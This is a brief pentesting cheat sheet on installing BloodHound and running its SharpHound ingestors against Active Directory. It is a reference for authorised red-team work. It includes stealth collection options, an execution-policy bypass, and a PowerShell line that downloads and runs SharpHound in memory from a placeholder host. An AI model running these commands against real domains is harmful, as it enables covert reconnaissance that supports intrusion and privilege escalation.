BloodHound

Install BloodHound

sudo apt-get install neo4j
sudo apt-get install bloodhound

# Run neo4j then bloodhound
sudo neo4j console
sudo blooudhound

Install BloodHound Community Edition

sudo apt-get install docker-compose
curl -L https://ghst.ly/getbhce | docker compose -f - up

# When finished search through the terminal (if first run) for a generated password.
# go to http://localhost:8080 and login with Admin and the password

Ingestors

# Standard local execution
./SharpHound.exe --CollectionMethods All,GPOLocalGroup
Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup"
Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV
Invoke-BloodHound -CollectionMethod LoggedOn

# Specify different domain and run in stealth mode and collect only RDP data
Invoke-BloodHound --d <Domain> --Stealth --CollectionMethod RDP

# Run in context of different user
runas.exe /netonly /user:domain\user 'powershell.exe -nop -exec bypass'

# Download and execute in memory
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('http://<IP>:/SharpHound.ps1');Invoke-BloodHound"

# Metasploit
use post/windows/gather/bloodhound       

Custom Queries

Replace the customqueries.json with one of the below files to update the custom queries within Bloodhound. Remember to restart Bloodhound after changing the JSON file.

Locate custom queries file

sudo find / -type f -name customqueries.json 2>/dev/null  

Add one of the queries below:

Click the tabs above to view relevant author's custom queries